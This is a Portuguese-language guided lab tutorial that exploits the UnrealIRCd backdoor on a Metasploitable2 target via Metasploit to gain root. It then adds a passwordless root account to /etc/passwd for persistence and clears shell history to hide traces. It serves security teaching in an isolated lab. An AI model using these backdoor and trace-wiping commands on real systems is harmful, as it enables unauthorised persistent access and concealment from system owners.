Criar Backdoor e Limpar Rastros na Máquina Alvo com Nmap

Beginner

Introdução

Neste laboratório, aprenderemos como criar um backdoor (porta dos fundos) e limpar rastros após obter acesso com sucesso a uma máquina alvo através de um ataque de penetração. O cenário é configurado no ambiente LabEx, onde usaremos o terminal Kali para explorar vulnerabilidades na máquina alvo Metasploitable2, obter acesso root, criar um backdoor para acesso futuro e limpar quaisquer rastros deixados durante o processo de ataque.

Este é um Lab Guiado, que fornece instruções passo a passo para ajudá-lo a aprender e praticar. Siga as instruções cuidadosamente para completar cada etapa e ganhar experiência prática. Dados históricos mostram que este é um laboratório de nível iniciante com uma taxa de conclusão de 96%. Recebeu uma taxa de avaliações positivas de 88% dos estudantes.

Obter Acesso Root na Máquina Alvo

Nesta etapa, usaremos a vulnerabilidade Unreal Ircd para obter acesso root na máquina alvo.

Agora você iniciará a máquina de ataque (container Kali Linux) e a máquina alvo (máquina virtual Metasploitable2) para o experimento.

  1. Abra um terminal xfce na máquina host LabEx e inicie o alvo Metasploitable2 executando o seguinte comando:
sudo virsh start Metasploitable2

Aguarde o início da máquina alvo, pode levar de 1 a 3 minutos.

  1. Teste a conectividade com a máquina alvo fazendo ping nela:
ping 192.168.122.102

Pressione Ctrl+C para parar o ping.

  1. Inicie o container Kali Linux e entre no ambiente bash executando:
docker run -ti --network host b5b709a49cd5 bash
  1. Dentro do container Kali, teste a conexão de rede com a máquina alvo:
ping 192.168.122.102

Pressione Ctrl+C para parar o ping.

Agora, tanto a máquina de ataque quanto a máquina alvo estão em execução, e você pode iniciar o teste de penetração.

Observação: Se você sair acidentalmente do bash atual, o container Kali parará automaticamente. Você pode executar docker run -ti --network host b5b709a49cd5 bash novamente no host para iniciar um novo container Kali e entrar no bash para continuar o experimento.

  1. No container Kali Linux, insira os seguintes comandos no terminal bash do Kali Linux:
service postgresql start
msfdb init
cd ~
msfconsole

Isso iniciará o serviço de banco de dados PostgreSQL, inicializará o banco de dados e iniciará o Metasploit Framework Console (msfconsole) para operações adicionais.

  1. Pesquise o módulo de vulnerabilidade Unreal Ircd:
search unreal_ircd
  1. Use o módulo unix/irc/unreal_ircd_3281_backdoor:
use exploit/unix/irc/unreal_ircd_3281_backdoor
  1. Defina o endereço IP do alvo:
set RHOST 192.168.122.102
  1. Exploit a vulnerabilidade para obter acesso:
exploit
  1. Verifique o usuário atual:
whoami

Você deve ver que obteve acesso root na máquina alvo.

Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção

Criar um Backdoor

Agora que obtivemos acesso root, vamos criar um backdoor para acesso futuro à máquina alvo.

Primeiramente, se você não estiver no console Metasploit, você deve iniciar o console Metasploit:

cd ~
msfconsole

Em seguida, verifique as informações do sistema:

uname -a

Encontre a localização do bash do usuário root:

cat /etc/passwd

Crie uma conta backdoor sem senha:

echo 'shiyanlou1234::0:0::/:/bin/sh' >> /etc/passwd

Verifique a criação da conta backdoor:

cat /etc/passwd

Você deve ver a nova conta shiyanlou1234 na saída.

Abra um novo terminal e conecte-se à máquina alvo usando a conta backdoor:

telnet 192.168.122.102

Insira o nome de usuário shiyanlou1234 quando solicitado.

Verifique o usuário atual:

whoami

Você deve ver que está logado como o usuário backdoor.

Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção

Apagar Rastros

Após obter acesso e criar um backdoor, é importante limpar quaisquer rastros deixados durante o processo de ataque para evitar a detecção.

Primeiramente, se você não estiver no console Metasploit, você deve iniciar o console Metasploit:

cd ~
msfconsole

Uma maneira comum de limpar rastros é remover o histórico de comandos. O histórico é armazenado no arquivo .bash_history. Você pode limpar o histórico usando o seguinte comando:

history -c

Para limpar o arquivo .bash_history, você pode encontrar sua localização usando o comando find:

find / -name .bash_history

Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção

Resumo

Neste laboratório, aprendemos como obter acesso root em uma máquina alvo usando a vulnerabilidade Unreal Ircd, criar uma conta backdoor para acesso futuro e limpar os rastros deixados durante o processo de ataque. Essa experiência prática o ajudará a entender as técnicas usadas por invasores para manter acesso persistente e encobrir seus rastros após um ataque de penetração bem-sucedido.